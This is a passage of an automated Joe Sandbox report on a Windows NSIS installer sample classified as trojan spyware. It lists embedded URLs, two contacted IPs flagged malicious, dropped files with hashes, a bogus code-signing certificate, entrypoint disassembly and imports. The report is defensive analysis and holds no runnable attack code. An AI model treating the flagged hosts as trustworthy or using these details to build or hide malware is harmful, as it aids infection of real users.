                        https://support.google.com/chrome/?p=plugin_quicktime | mixfive_20211216-221155.exe, 0000000C.00000002.1005789516.000000001E88E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmp | false | | high
                        http://schemas.xmlsoap.org/ws/2004/04/sc | mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp | false | | high
                        http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC | mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp | false | | high
                        http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel | mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp | false | | high
                        http://tempuri.org/Entity/Id9Response | mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | mixfive_20211216-221155.exe, 0000000C.00000002.1005492436.000000001E71E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005443083.000000001E708000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006499863.000000001F57A000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005311100.000000001E646000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006136622.000000001F477000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005148881.000000001E581000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000003.997128279.000000001F6AF000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000003.997051603.000000001F63E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006342484.000000001F509000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000003.997223453.000000001F720000.00000004.00000001.sdmp | false | | high
                        http://tempuri.org/Entity/Id20 | mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                        http://tempuri.org/Entity/Id21 | mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                        http://tempuri.org/Entity/Id22 | mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                        http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1 | mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp | false | | high
                        http://tempuri.org/Entity/Id23 | mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                        http://nsis.sf.net/NSIS_ErrorError | mixfive_20211216-221155.exe | false | | high
                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1 | mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp | false | | high
                        http://tempuri.org/Entity/Id24 | mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue | mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp | false | | high
                        http://tempuri.org/Entity/Id24Response | mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                        http://tempuri.org/Entity/Id1Response | mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                        http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested | mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmp | false | | high
                        http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly | mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp | false | | high
                        http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay | mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp | false | | high
                        http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego | mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp | false | | high
                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary | mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp | false | | high
                        http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC | mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp | false | | high
                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey | mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp | false | | high
                        http://schemas.xmlsoap.org/ws/2004/08/addressing | mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmp | false | | high
                        https://support.google.com/chrome/?p=plugin_shockwave | mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmp | false | | high
                        http://forms.rea | mixfive_20211216-221155.exe, 0000000C.00000002.1005789516.000000001E88E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmp | false |
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuemixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/Completionmixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/trustmixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://tempuri.org/Entity/Id10mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        http://tempuri.org/Entity/Id11mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        http://tempuri.org/Entity/Id12mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        http://tempuri.org/Entity/Id16Responsemixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponsemixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancelmixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://tempuri.org/Entity/Id13mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            http://tempuri.org/Entity/Id14mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            http://tempuri.org/Entity/Id15mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            http://tempuri.org/Entity/Id16mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/Noncemixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://tempuri.org/Entity/Id17mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://tempuri.org/Entity/Id18mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://tempuri.org/Entity/Id5Responsemixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://tempuri.org/Entity/Id19mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsmixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://tempuri.org/Entity/Id10Responsemixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/Renewmixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://tempuri.org/Entity/Id8Responsemixfive_20211216-221155.exe, 0000000C.00000002.1005492436.000000001E71E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://support.google.com/chrome/?p=plugin_wmpmixfive_20211216-221155.exe, 0000000C.00000002.1005789516.000000001E88E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKeymixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDmixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://support.google.com/chrome/answer/6258784mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmpfalse
                                                                                                                                            high

Contacted IPs

Public

IP              Domain   Country             ASN    ASN Name                  Malicious
185.112.83.8    unknown  Russian Federation  50113  SUPERSERVERSDATACENTERRU  true
194.26.229.202  unknown  Netherlands         1213   HEANETIE                  true

General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 541451
Start date: 17.12.2021
Start time: 10:14:52
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 26s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: mixfive_20211216-221155 (renamed file extension from none to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/4@0/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 24.8% (good quality ratio 24.3%)
• Quality average: 88.3%
• Quality standard deviation: 21%
HCA Information:
• Successful, ratio: 83%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Override analysis time to 240s for sample files taking high CPU consumption
• Stop behavior analysis, all processes terminated
Warnings:
• Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 23.54.113.53
• Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time      Type             Description
10:18:23  API Interceptor  20x Sleep call for process: mixfive_20211216-221155.exe modified

Joe Sandbox View / Context

IPs: No context

Domains: No context

ASN: No context

JA3 Fingerprints: No context

Dropped Files: No context

                                                                                                                                            Created / dropped Files

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\mixfive_20211216-221155.exe.log
                                                                                                                                            Process:C:\Users\user\Desktop\mixfive_20211216-221155.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 2291
Entropy (8bit): 5.3192079301865585
Encrypted: false
SSDEEP: 48:MIHKmfHK5HKXAHKhBHKdHKB1AHKzvQTHmYHKhQnoPtHoxHImHK1HxLHG1qHqH5HX:Pqaq5qXAqLqdqUqzcGYqhQnoPtIxHbqG
MD5: 2308F672881D77B53310A221B4D27E95
SHA1: 80371C7B5D415DC46F2BB4BA872B14AF0B0EED8B
SHA-256: 83D6F5E305A78D3EAB05CFB58D8595FECB2755E80978C6D6236AEF9186E65CDB
SHA-512: ECFBCDFAA24CEE02DFAD3175043FF4408F100E0867A66AE3AF14C2C7CB572E451C052A4D5FA452F6FB5C732C082DA7AB321F58CF65E37862E777EEF4DADDC652
Malicious: false
Reputation: moderate, very likely benign file
                                                                                                                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.IdentityModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\34957343ad5d84daee97a1affda91665\System.Runtime.Serialization.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b
C:\Users\user\AppData\Local\Temp\a.txt
Process: C:\Users\user\Desktop\mixfive_20211216-221155.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 23
Entropy (8bit): 2.2068570640942187
Encrypted: false
SSDEEP: 3:jNDBfN:jNVfN
MD5: 6C3AA179406696C66ACF8DC984ABC7DF
SHA1: 7F66AB35CA41A3449382F9DA68864D64EC182F28
SHA-256: 798DF5B3298985AE022F8C5A6714F7891EAA49B2E4B24E3A8B2329C04DD11C71
SHA-512: 7551B1FBE1CAEF52FD0AFC8601DCD0D6F013198FCC7CBF57F42EB090577B34B91E6F4ADCE1A76BC7FFD95559A3FDD529FE6DE90B8335EF8E901CBB606DDAE836
Malicious: false
Reputation: low
Preview: ghdfhjfghfgjfdghfghfgdh
C:\Users\user\AppData\Local\Temp\nsiE423.tmp\System.dll
Process: C:\Users\user\Desktop\mixfive_20211216-221155.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 12288
Entropy (8bit): 5.814115788739565
Encrypted: false
SSDEEP: 192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
MD5: CFF85C549D536F651D4FB8387F1976F2
SHA1: D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
SHA-256: 8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
SHA-512: 531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
Malicious: false
Antivirus:
• Antivirus: Metadefender, Detection: 3%
• Antivirus: ReversingLabs, Detection: 0%
Reputation: low
                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\superprecise.dat
Process: C:\Users\user\Desktop\mixfive_20211216-221155.exe
File Type: DOS executable (COM)
Category: dropped
Size (bytes): 45816
Entropy (8bit): 7.731391764710501
Encrypted: false
SSDEEP: 768:zvYUFVu+AKtzruz6ProsiAXEq7kjANo6iVW/lccurKOaYgoBhbz77k+yOCf:zgUFWCoaosiAXVkj448acQRn7k+FCf
MD5: A1802D9DCD94AF7E3F2CE4577BA6E667
SHA1: 1B836F996B3FB4E812516EBDEA714FACCB45ADF3
SHA-256: DCC5CD1E4CC8AFE4A04F8931DA635821B60A07869DAC0327D043B26C96C39680
SHA-512: 0177CD7562C6121D31F2EBBCD29EA6C0927C49A03F06101C94AD92FC999064369DBA629418EAF774A82333F1C10DBB3D23F3EA5C32C03EF43C8982C8808A3627
Malicious: false
Reputation: low
                                                                                                                                            Preview: .__.?.u.....u.....u..........a.....H....s.r..tb..........R..~...Q..a...Z1..4.z.......9.u.W..........z..z.....I.....J[.0P>.....T.-.......4C.Bj.@.*....*.7@.g..N.&v.~..b.jlE1......u)W..M....Az|.~..cd.c.<..;x.W..]g..j..3.K...Z...a......{|.A..h....F9......E.E...k..r.H8.#.Mc..!N.../..n.WC.\.u*l.o^.-6..{.%9;.I..&Q......os.".U5k.tQ5../6.uP.T..?.I.........o..NsWu\..".o.Y-EU.We..T...i.3.Nk..s..<...."...mc.3..{...z...m....lw..L.{......R.I.|.*..Iqr.z...B.$.>qp....o..Wn.rCm......&..]...... .IcfG..b.....E....C,".>pF.pE.}q...qh.z..>.>.j....S....$y.!.%.C'....-{.......6.a?. .fN_...C....g?. .fN....,..!.z}.&z...C7BX........".l.l*.g....z}jk...6.y..z...Ac.z..k..7Iz...B.l.^..T.5.7.....a.b............+...$.-B6g..&R\t.......8P.>3...2...T.6..0....F......{........"....Up.W.T5 .|..u............."...wt...7"..}...0.(....g....kb..m.oXoN....1g.)...>.*.^d.ROu.......G..%V.aN."....K.........w......H.}&v{..WT ......2.*...z......B..X%...."...>../6....>k.]CA*.q.*....l.... .\.;.x..uB.'.

Static File Info

General

File type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit): 7.516196878438645
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: mixfive_20211216-221155.exe
File size: 94872
MD5: 66e3c71bcd364eb5cf19cb820683ef0c
SHA1: a51f002e800d652c14b2de10a63bbb80d276a33b
SHA256: ee23fa71bea1f05017e21b38e7592db6334a0fc4e9e44bb48452b40a4ddf0677
SHA512: aaebefe644c3f4574f787a45581e95ec34e0c31183ef10c0d2246849b4f87e5e9c593dbb29083730c0f9e6e41f58ed4f1b9e33153f2b6c7c1ed789bc1047468f
SSDEEP: 1536:C/T2X/jN2vxZz0DTHUpouMJbKxE+1COGa5Cq1IpBN+mzFGFDGBXTgpMu:CbG7N2kDTHUpouMJbKPCOHPKpjZcFiBm
                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j.........

File Icon

Icon Hash: b2a88c96b2ca6a72

Static PE Info

General

Entrypoint: 0x40352d
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x614F9B5A [Sat Sep 25 21:57:46 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 56a78d55f3f7af51443e58e0ce2fb5f6

Authenticode Signature

Signature Valid: false
Signature Issuer: E=Befattet1@PROGRAMMRENS.je, CN=HOOSIERS, OU=Stridhanum, O=cacogenics, L=PREEXCLUDE, S=Kildeprogram5, C=BO
Signature Validation Error: A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number: -2146762487
Not Before, Not After:
• 12/16/2021 9:40:48 PM, 12/16/2022 9:40:48 PM
Subject Chain:
• E=Befattet1@PROGRAMMRENS.je, CN=HOOSIERS, OU=Stridhanum, O=cacogenics, L=PREEXCLUDE, S=Kildeprogram5, C=BO
Version: 3
Thumbprint MD5: C38498DE2531ABF84BECF49043690614
Thumbprint SHA-1: 2842B94EA877AFB3636B19981AAA0064D670C195
Thumbprint SHA-256: 615A16AE963F927807D331ACBC53376A766EA5DD3B6C976EB920B62F562AFD5B
Serial: 00

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 000003F4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [ebp-14h], ebx
mov dword ptr [ebp-04h], 0040A2E0h
mov dword ptr [ebp-10h], ebx
call dword ptr [004080CCh]
mov esi, dword ptr [004080D0h]
lea eax, dword ptr [ebp-00000140h]
push eax
mov dword ptr [ebp-0000012Ch], ebx
mov dword ptr [ebp-2Ch], ebx
mov dword ptr [ebp-28h], ebx
mov dword ptr [ebp-00000140h], 0000011Ch
call esi
test eax, eax
jne 00007FF048961DDAh
lea eax, dword ptr [ebp-00000140h]
mov dword ptr [ebp-00000140h], 00000114h
push eax
call esi
mov ax, word ptr [ebp-0000012Ch]
mov ecx, dword ptr [ebp-00000112h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [ebp-26h], 00000004h
not eax
and eax, ecx
mov word ptr [ebp-2Ch], ax
cmp dword ptr [ebp-0000013Ch], 0Ah
jnc 00007FF048961DAAh
and word ptr [ebp-00000132h], 0000h
mov eax, dword ptr [ebp-00000134h]
movzx ecx, byte ptr [ebp-00000138h]
mov dword ptr [00434FB8h], eax
xor eax, eax
mov ah, byte ptr [ebp-0000013Ch]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [ebp-2Ch]
movzx ecx, cx
shl eax, 10h
or eax, ecx

Rich Headers

Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8610 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4c000 | 0xe48 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x15e30 | 0x1468 | .data
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6897 | 0x6a00 | False | 0.666126179245 | data | 6.45839821493 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x14a6 | 0x1600 | False | 0.439275568182 | data | 5.02410928126 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x2b018 | 0x600 | False | 0.521484375 | data | 4.15458210409 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x36000 | 0x16000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x4c000 | 0xe48 | 0x1000 | False | 0.38916015625 | data | 4.02680822028 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x4c208 | 0x2e8 | data | English | United States
RT_DIALOG | 0x4c4f0 | 0x100 | data | English | United States
RT_DIALOG | 0x4c5f0 | 0x11c | data | English | United States
RT_DIALOG | 0x4c710 | 0xc4 | data | English | United States
RT_DIALOG | 0x4c7d8 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x4c838 | 0x14 | data | English | United States
RT_VERSION | 0x4c850 | 0x2b4 | data | English | United States
RT_MANIFEST | 0x4cb08 | 0x33e | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

Imports

DLL | Import
ADVAPI32.dll | RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll | SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
